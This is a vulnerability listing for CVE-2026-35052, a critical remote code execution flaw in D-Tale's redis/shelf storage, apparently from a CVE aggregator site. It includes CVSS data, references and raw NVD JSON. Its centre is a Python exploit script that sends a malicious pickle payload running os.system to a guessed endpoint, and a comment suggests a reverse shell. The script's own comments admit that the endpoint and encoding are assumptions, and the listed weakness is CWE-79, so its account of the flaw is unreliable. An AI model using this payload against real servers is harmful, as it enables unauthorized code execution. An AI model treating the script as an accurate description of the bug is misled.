CVE-2026-35052

Description

D-Tale is the combination of a Flask back-end and a React front-end to view & analyze Pandas data structures. Prior to 3.22.0, users hosting D-Tale publicly while using a redis or shelf storage layer could be vulnerable to remote code execution allowing attackers to run malicious code on the server. This vulnerability is fixed in 3.22.0.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:man:d-tale:*:*:*:*:*:*:*:* - VULNERABLE

D-Tale < 3.22.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import pickle
import base64

# Proof of Concept for CVE-2026-35052
# Description: Exploits insecure deserialization in D-Tale using Redis/Shelf storage.

# Target configuration
TARGET_URL = "http://vulnerable-d-tale-host:40000"

# Define malicious payload (e.g., command execution)
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., creating a file or reverse shell)
        import os
        return (os.system, ('touch /tmp/pwned',))

# Serialize the payload using pickle
serialized_data = pickle.dumps(MaliciousPayload())

# Encode if necessary (depending on API implementation)
# Assuming the API accepts base64 encoded data for storage
encoded_payload = base64.b64encode(serialized_data).decode('utf-8')

# Construct the malicious request
# Note: The exact endpoint might vary based on D-Tale configuration
endpoint = f"{TARGET_URL}/dtale/process-data"

headers = {
    "Content-Type": "application/json"
}

# Payload structure simulating data sent to the storage layer
payload_json = {
    "data_id": "exploit_test",
    "data": encoded_payload,
    "store_type": "redis" # Explicitly targeting vulnerable storage
}

try:
    print("Sending malicious payload to target...")
    response = requests.post(endpoint, json=payload_json, headers=headers, timeout=5)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error during exploitation: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35052
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35052
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35052/
[4] VulDB https://vuldb.com/cve/CVE-2026-35052
[5] https://github.com/man-group/dtale/security/advisories/GHSA-436g-fhfc-9g5w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35052", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:42.747", "lastModified": "2026-04-20T18:36:34.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Tale is the combination of a Flask back-end and a React front-end to view & analyze Pandas data structures. Prior to 3.22.0, users hosting D-Tale publicly while using a redis or shelf storage layer could be vulnerable to remote code execution allowing attackers to run malicious code on the server. This vulnerability is fixed in 3.22.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:man:d-tale:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.22.0", "matchCriteriaId": "B6E18AFE-D726-4140-9A1D-1A993EF4B206"}]}]}], "references": [{"url": "https://github.com/man-group/dtale/security/advisories/GHSA-436g-fhfc-9g5w", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}